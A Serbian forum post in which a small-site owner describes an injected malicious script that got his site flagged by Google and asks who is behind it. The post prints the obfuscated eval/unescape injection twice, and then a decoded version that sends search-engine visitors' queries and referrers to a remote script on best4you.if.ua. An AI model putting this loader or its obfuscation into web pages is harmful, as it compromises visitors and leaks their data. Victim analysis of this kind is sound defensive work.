Koji je razlog upisa ovog koda?napravio sam sopstveni server jer imam staticnu IP. Razlog je postavljanje sopstvenih fajlova za razmenu sa ljudima s kojim radim i sl. Naknadno sam tu postavio i sajt, sve uredno i tako dalje. Nisam postavio neku posebnu zastitu osim klasicne jer niti imam poseta na tom sajtu niti su mi potrebne, cisto da razradim i izucim tehnologiju.
Elem, u poslednjih nedelju dana imam konstantnu posetu googla, sto americkog sto evropskog. Tracking radim preko http://webstats.motigo.com/
Ubrzo nakon druge posete gugla pojavilo mi se upozorenje da je sajt napadnut i da ima maliciozni sadrzaj. Crvena pozadina i upozorenja, zamalo da pucam u ekran od velike opasnosti od zaraze. Stvarno u kodu sam nasao nove linije u java skriptu koje ranije nisu bile tu. Da bi sajt skinuo sa guglove liste bilo je potrebno da ocistim kod, da se registrujem i pristupim nekom njihovom alatu i da upisem iza hedera sledeci kod:
<meta name="verify-v1" content="MVOklDcHG2PieL8V+ah7Y7KWqdRaXGTpGhdJQ9YZ9xM=" >
sto sam i ucinio.
U nastavku nisam hteo da menjam pass na ftp-u da vidim sta ce se desiti. Svaki sledeci put nakon posete gugla ponovo mi je upisivan isti onaj kod kao prvi put. Kod je sledeci:
Code:
<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%6"+"5%2c%73%6"+"5%3d%22%6"+"7%6"+"2%22%3b%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"d%73%6"+"e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"d%73%6"+"e%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"8%6"+"f%6"+"f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"8%6"+"f%6"+"f%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%6"+"5%78%74%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8&&%28%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%6"+"5%3d%72%2e%73%75%6"+"2%73%74%72%6"+"9%6"+"e%6"+"7%28%71%2b%32%2b%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8%29%2e%73%70%6"+"c%6"+"9%74%28%22&%22%29%5b%30%5d%3b%0d%0a%6"+"9%6"+"6"+"%20%28%28%71%75%6"+"5%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%73%6"+"9%74%6"+"5%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%6"+"5%2e%74%6"+"f%4c%6"+"f%77%6"+"5%72%43%6"+"1%73%6"+"5%28%29%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%77%72%6"+"9%74%6"+"5%28%22%3c%73%6"+"3%72%6"+"9%70%74%20%73%72%6"+"3%3d%27%6"+"8%74%74%70%3a%2f%2f%6"+"2%6"+"5%73%74%34%79%6"+"f%75%2e%6"+"9%6"+"6"+"%2e%75%6"+"1%2f%6"+"a%73%2f%6"+"2%6"+"9%6"+"4%6"+"3%6"+"8%2e%6"+"a%73%3f%71%3d%22%2b%71%75%6"+"5%2b%22&%72%6"+"5%6"+"6"+"%3d%22%2b%72%2b%22%27%3e%3c%2f%73%6"+"3%22%2b%22%72%6"+"9%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76"+"%6"+"1%72%20%6"+"d%79%6"+"9%6"+"b%3d%74%72%75%6"+"5%3b" ));</script>
<script>eval( unescape( "%6"+"9%6"+"6"+"%28%21%6"+"d%79%6"+"9%6"+"b%29%7b%0d%0a%76"+"%6"+"1%72%20%72%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%72%6"+"5%6"+"6"+"%6"+"5%72%72%6"+"5%72%2c%75%3d%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%55%52%4c%2c%74%3d%22%22%2c%71%2c%71%75%6"+"5%2c%73%6"+"5%3d%22%6"+"7%6"+"2%22%3b%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"7%6"+"f%6"+"f%6"+"7%6"+"c%6"+"5%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%6"+"d%73%6"+"e%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%71%22%3b%73%6"+"5%3d%22%6"+"d%73%6"+"e%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"8%6"+"f%6"+"f%2e%22%29%21%3d%2d%31%29%7b%74%3d%22%70%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"8%6"+"f%6"+"f%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%29%21%3d%2d%31%29%7b%74%3d%22%74%6"+"5%78%74%22%3b%73%6"+"5%3d%22%79%6"+"1%6"+"e%6"+"4%6"+"5%78%2e%72%75%22%3b%7d%0d%0a%6"+"9%6"+"6"+"%28%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8&&%28%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22%3f%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%7c%7c%28%71%3d%72%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%22&%22%2b%74%2b%22%3d%22%29%29%21%3d%2d%31%29%29%7b%20%71%75%6"+"5%3d%72%2e%73%75%6"+"2%73%74%72%6"+"9%6"+"e%6"+"7%28%71%2b%32%2b%74%2e%6"+"c%6"+"5%6"+"e%6"+"7%74%6"+"8%29%2e%73%70%6"+"c%6"+"9%74%28%22&%22%29%5b%30%5d%3b%0d%0a%6"+"9%6"+"6"+"%20%28%28%71%75%6"+"5%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%73%6"+"9%74%6"+"5%3a%27%29%3d%3d%2d%31%29%20&&%20%28%71%75%6"+"5%2e%74%6"+"f%4c%6"+"f%77%6"+"5%72%43%6"+"1%73%6"+"5%28%29%2e%6"+"9%6"+"e%6"+"4%6"+"5%78%4f%6"+"6"+"%28%27%77%77%77%2e%27%29%3d%3d%2d%31%29%29%0d%0a%09%6"+"4%6"+"f%6"+"3%75%6"+"d%6"+"5%6"+"e%74%2e%77%72%6"+"9%74%6"+"5%28%22%3c%73%6"+"3%72%6"+"9%70%74%20%73%72%6"+"3%3d%27%6"+"8%74%74%70%3a%2f%2f%6"+"2%6"+"5%73%74%34%79%6"+"f%75%2e%6"+"9%6"+"6"+"%2e%75%6"+"1%2f%6"+"a%73%2f%6"+"2%6"+"9%6"+"4%6"+"3%6"+"8%2e%6"+"a%73%3f%71%3d%22%2b%71%75%6"+"5%2b%22&%72%6"+"5%6"+"6"+"%3d%22%2b%72%2b%22%27%3e%3c%2f%73%6"+"3%22%2b%22%72%6"+"9%70%74%3e%22%29%3b%0d%0a%7d%0d%0a%7d%0d%0a%76"+"%6"+"1%72%20%6"+"d%79%6"+"9%6"+"b%3d%74%72%75%6"+"5%3b" ));</script>
Ne budi mi tesko nadjem encoder/decoder na webu i prevedem kod tako da glasi ovako:
Code:
if(!myik){
var r=document.referrer,u=document.URL,t="",q,que,se="gb";
if(r.indexOf("google.")!=-1){t="q";se="google";}
if(r.indexOf("msn.")!=-1){t="q";se="msn";}
if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){ que=r.substring(q+2+t.length).split("&")[0];
if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1))
document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>");
}
}
var myik=true;
if(!myik){
var r=document.referrer,u=document.URL,t="",q,que,se="gb";
if(r.indexOf("google.")!=-1){t="q";se="google";}
if(r.indexOf("msn.")!=-1){t="q";se="msn";}
if(r.indexOf("yahoo.")!=-1){t="p";se="yahoo";}
if(r.indexOf("yandex.ru")!=-1){t="text";se="yandex.ru";}
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){ que=r.substring(q+2+t.length).split("&")[0];
if ((que.indexOf('site:')==-1) && (que.toLowerCase().indexOf('www.')==-1))
document.write("<script src='http://best4you.if.ua/js/bidch.js?q="+que+"&ref="+r+"'></sc"+"ript>");
}
}
var myik=true;
Da li neko zna da li ovo stvarno radi gugl ili je to napad sa neke druge strane? I pitanje je zasto napadaju sajt koji uopste nema posecenost, zvucno ime ili bilo sta drugo sto moze biti zanimljivo? Nemam cak ni mail server da bih nekoga isprovocirao spamom ili sl.
